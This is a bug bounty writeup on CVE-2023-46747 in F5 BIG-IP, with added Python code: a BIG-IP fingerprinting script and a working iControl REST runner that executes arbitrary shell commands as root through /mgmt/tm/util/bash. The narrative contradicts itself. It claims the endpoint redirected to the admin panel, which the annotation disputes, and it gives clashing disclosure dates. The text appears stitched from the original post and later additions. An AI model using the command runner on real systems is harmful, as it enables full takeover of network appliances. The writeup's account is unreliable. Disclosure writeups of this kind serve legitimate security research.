How I Got a $1000 Bounty From X-Company? (RCE + Authentication Bypass)
Hello all, Raj here! I’m back with some interesting findings.
I know it’s been a while since my last writeup—been busy with some good projects and learning new things. But without further delay, let’s dive right in.
Introduction:
Bug bounty programs provide a unique opportunity to explore the depths of cybersecurity, presenting challenges that often lead to intriguing discoveries. Recently, during my active engagement in testing, I uncovered a Remote Code Execution (RCE) + authentication bypass vulnerability at a top company (due to their policy, I won’t reveal the name, so let’s just call it X-company): CVE-2023-46747.
Let’s go…
On May 16, 2024, I disclosed a vulnerability I identified on an internal IP owned by X-company. This was part of their Bug Bounty program, where rewards are given for finding security vulnerabilities. I discovered an authentication bypass vulnerability in X-company’s F5 BIG-IP. The vulnerability has a critical severity rating with a CVSS score of 9.8. Successful exploitation could allow an attacker to perform remote code execution on the target system.
My Methodology:
“Reconnaissance is the initial step in bug hunting.”
- I started by gathering the in-scope domains.
- Then I kicked off active and passive subdomain enumeration using various tools. For passive subdomain enumeration, I used Subfinder with API keys from different services like Shodan, Censys, Chaos, GitHub, Sublist3r, etc. For active subdomain enumeration, I used the Best DNS Wordlist from the Assetnote Wordlist.
- I ended up identifying around 10,889 subdomains and IPs.
- The next step was filtering out live domains based on their status codes.
- I quickly identified the internal IP with the F5 BIG-IP and confirmed it using Wappalyzer.
- Here’s where the actual journey begins.
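The filtering and fingerprinting steps above (keeping the hosts that answer, then spotting the BIG-IP among them) can be scripted once the probe output is on disk. The Python below is an added example, not code from the original writeup, and it swaps the Wappalyzer check for header and title heuristics. It assumes httpx-style JSON lines with url, status_code, title and header fields (the five records are constructed, not the author's scan data), and it treats a Server header starting with BigIP, a BIGipServer persistence cookie, a BIG-IP page title, or a redirect into /tmui/ as indicators; these are well-known F5 fingerprints, but which of them a given target exposes is an assumption.

```python
import json

# Constructed httpx-style probe records (not the author's scan output).
SAMPLE_PROBE_OUTPUT = """\
{"url": "https://app.example.com", "status_code": 200, "title": "Welcome", "header": {"server": "nginx"}}
{"url": "https://old.example.com", "status_code": 404, "title": "Not Found", "header": {"server": "Apache"}}
{"url": "https://10.10.5.21", "status_code": 200, "title": "BIG-IP&reg;- Redirect", "header": {"server": "BigIP", "set_cookie": "BIGipServerpool_web=1234.20480.0000; path=/"}}
{"url": "https://vpn.example.com", "status_code": 302, "title": "", "header": {"location": "/tmui/login.jsp", "server": "Apache"}}
{"url": "https://dead.example.com", "status_code": 0, "title": "", "header": {}}
"""

# Anything that produced an HTTP response counts as live, including 401/403/404:
# an auth-walled management interface is exactly the kind of host to keep.
LIVE_STATUS = range(100, 600)


def is_live(record):
    return record.get("status_code", 0) in LIVE_STATUS


def bigip_indicators(record):
    """Return the BIG-IP fingerprints matched by one probe record (assumed heuristics)."""
    headers = {k.lower(): str(v) for k, v in record.get("header", {}).items()}
    title = (record.get("title") or "").lower()
    hits = []
    if headers.get("server", "").lower().startswith("bigip"):
        hits.append("server:BigIP")
    if "bigipserver" in headers.get("set_cookie", "").lower():
        hits.append("cookie:BIGipServer")
    if "big-ip" in title:
        hits.append("title:BIG-IP")
    if "/tmui/" in headers.get("location", ""):
        hits.append("location:/tmui/")
    return hits


def triage(probe_lines):
    """Parse JSON lines, drop dead hosts, return (url, status, indicators) for the rest."""
    results = []
    for line in probe_lines.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        if not is_live(record):
            continue
        results.append((record["url"], record["status_code"], bigip_indicators(record)))
    return results


def likely_bigip(probe_lines):
    """URLs worth a closer look: live and carrying at least one BIG-IP indicator."""
    return [url for url, _, hits in triage(probe_lines) if hits]


if __name__ == "__main__":
    for url, status, hits in triage(SAMPLE_PROBE_OUTPUT):
        print(f"{status} {url} {' '.join(hits) or '-'}")
    print("candidates:", likely_bigip(SAMPLE_PROBE_OUTPUT))
```

A candidate from this pass still needs manual confirmation (opening /tmui/login.jsp in a browser is enough), and a host that only answers on an internal address should be checked against the program's scope rules before anything more than fingerprinting is done.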
Recently, I came across the F5 BIG-IP Unauthenticated Remote Code Execution Vulnerability (CVE-2023-46747).
CVE-2023-46747 is a critical vulnerability that allows undisclosed requests to bypass Configuration utility (TMUI) authentication, enabling an attacker with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands.
Geared up, I discovered an endpoint (/mgmt/tm/util/bash) that was vulnerable to CVE-2023-46747.
The endpoint itself is not where the bypass lives. /mgmt/tm/util/bash is the iControl REST utility that runs a shell command on the appliance, and it requires valid BIG-IP credentials; an unauthenticated request gets a 401. What CVE-2023-46747 adds is the authentication bypass in the Configuration utility: an unauthenticated attacker with network access to the management port and/or self-IP addresses can create an administrative account through it, and those credentials then turn /mgmt/tm/util/bash into arbitrary command execution as root. That is also why the public exploits and the Nuclei template report a freshly created username and password alongside the command output.
Once I confirmed the vulnerability, the next task was to find a proper exploit. There are many exploit scripts available, but several give false positives. So, I opted for an exploit using a Nuclei template, and this approach worked effectively.
Exploit Process for Remote Code Execution (RCE) and Authentication Bypass:
=> First, I ran a Nuclei scan and waited for the results.
=> BOOM…! RCE is working—I got the system ID, username, and password.
=> Next, I decided to increase the impact by exploiting the authentication bypass.
=> So, I navigated to the $ip/mgmt/tm/util/bash site, entered the username and password, and BOOM! I was redirected to the F5 BIG-IP admin panel on the internal network.
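Both exploit stages above (command execution via the Nuclei template, then reuse of the credentials it returned) meet at the same endpoint, and the part worth seeing in code is the second: how /mgmt/tm/util/bash is driven once credentials are in hand. The Python below is an added example, not the author's exploit, the Nuclei template, or F5 code. It does not implement the CVE-2023-46747 bypass itself; it assumes the account already exists, uses the documented iControl REST request shape (POST with {"command": "run", "utilCmdArgs": "-c ..."} under Basic auth, commandResult in the reply), and talks to a constructed in-memory stand-in for the appliance so it runs offline. The host 10.10.5.21 and the hunter/s3cret account are placeholders.

```python
import base64
import json
import shlex

# Constructed command output in the shape iControl REST returns (not a capture from the
# author's target). The "system ID" the writeup mentions is this same `id` line.
FAKE_COMMAND_RESULT = "uid=0(root) gid=0(root) groups=0(root)\n"


def basic_token(username, password):
    return base64.b64encode(f"{username}:{password}".encode()).decode()


def build_bash_request(base_url, username, password, cmd):
    """Assemble the documented iControl REST call that runs `cmd` via /mgmt/tm/util/bash.

    The endpoint is authenticated; the Basic credentials are the account the
    CVE-2023-46747 bypass created, which is why the exploit output includes them.
    """
    url = base_url.rstrip("/") + "/mgmt/tm/util/bash"
    headers = {
        "Authorization": "Basic " + basic_token(username, password),
        "Content-Type": "application/json",
    }
    # utilCmdArgs is handed to bash; quote so the whole command is one -c argument.
    body = {"command": "run", "utilCmdArgs": "-c " + shlex.quote(cmd)}
    return url, headers, json.dumps(body)


def parse_bash_response(status, body_text):
    """Extract commandResult, distinguishing a rejected login from other failures."""
    if status == 401:
        raise PermissionError("credentials rejected: /mgmt/tm/util/bash is authenticated")
    if status != 200:
        raise RuntimeError(f"unexpected HTTP {status}: {body_text[:200]}")
    return json.loads(body_text).get("commandResult", "")


def run_bash(transport, base_url, username, password, cmd):
    """transport(url, headers, body) -> (status, text); injected so the demo runs offline."""
    url, headers, body = build_bash_request(base_url, username, password, cmd)
    status, text = transport(url, headers, body)
    return parse_bash_response(status, text)


def credentials_work(transport, base_url, username, password):
    """Cheap validity check before doing anything noisier: run `id` and look for uid=."""
    try:
        return run_bash(transport, base_url, username, password, "id").startswith("uid=")
    except PermissionError:
        return False


def fake_transport(accepted_token):
    """Offline stand-in for the appliance: accepts one Basic token, mimics the REST shapes."""
    def _send(url, headers, body):
        if headers.get("Authorization") != "Basic " + accepted_token:
            return 401, json.dumps({"code": 401, "message": "Authorization failed"})
        request = json.loads(body)
        if not url.endswith("/mgmt/tm/util/bash") or request.get("command") != "run":
            return 400, json.dumps({"code": 400, "message": "bad request"})
        return 200, json.dumps({
            "kind": "tm:util:bash:runstate",
            "command": "run",
            "utilCmdArgs": request["utilCmdArgs"],
            "commandResult": FAKE_COMMAND_RESULT,
        })
    return _send


def requests_transport(url, headers, body):
    """Live transport for an in-scope, authorised target; imported lazily so the demo stays offline."""
    import requests
    # BIG-IP management interfaces commonly present a self-signed certificate.
    response = requests.post(url, headers=headers, data=body, timeout=15, verify=False)
    return response.status_code, response.text


if __name__ == "__main__":
    appliance = fake_transport(basic_token("hunter", "s3cret"))
    print(credentials_work(appliance, "https://10.10.5.21", "hunter", "s3cret"))   # True
    print(credentials_work(appliance, "https://10.10.5.21", "hunter", "wrong"))    # False
    print(run_bash(appliance, "https://10.10.5.21", "hunter", "s3cret", "id"), end="")
```

Point requests_transport at a real host only inside the program's scope and with the bypass-created account recorded in the report. The 401 branch is the caveat that matters: an exploit script that treats any reply from this endpoint as success is exactly the false-positive behaviour described above, whereas a command result that starts with uid= is proof.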
After that, I reported this issue through their Bug Bounty Program.
X-company has since fixed the issue, and I want to commend them for their responsiveness. This is an excellent example of a company that takes security seriously and rewards those who help them identify and fix issues.
Timeline:
- May 2024—Submitted bug report.
- May 13, 2024—X-company marked it as triaged.
- May 14, 2024—They verified the vulnerability and began the fixing process.
- May 16, 2024—Marked as resolved, and the bounty 💸 was awarded.
I hope this inspires you.
Thanks for reading! 🙂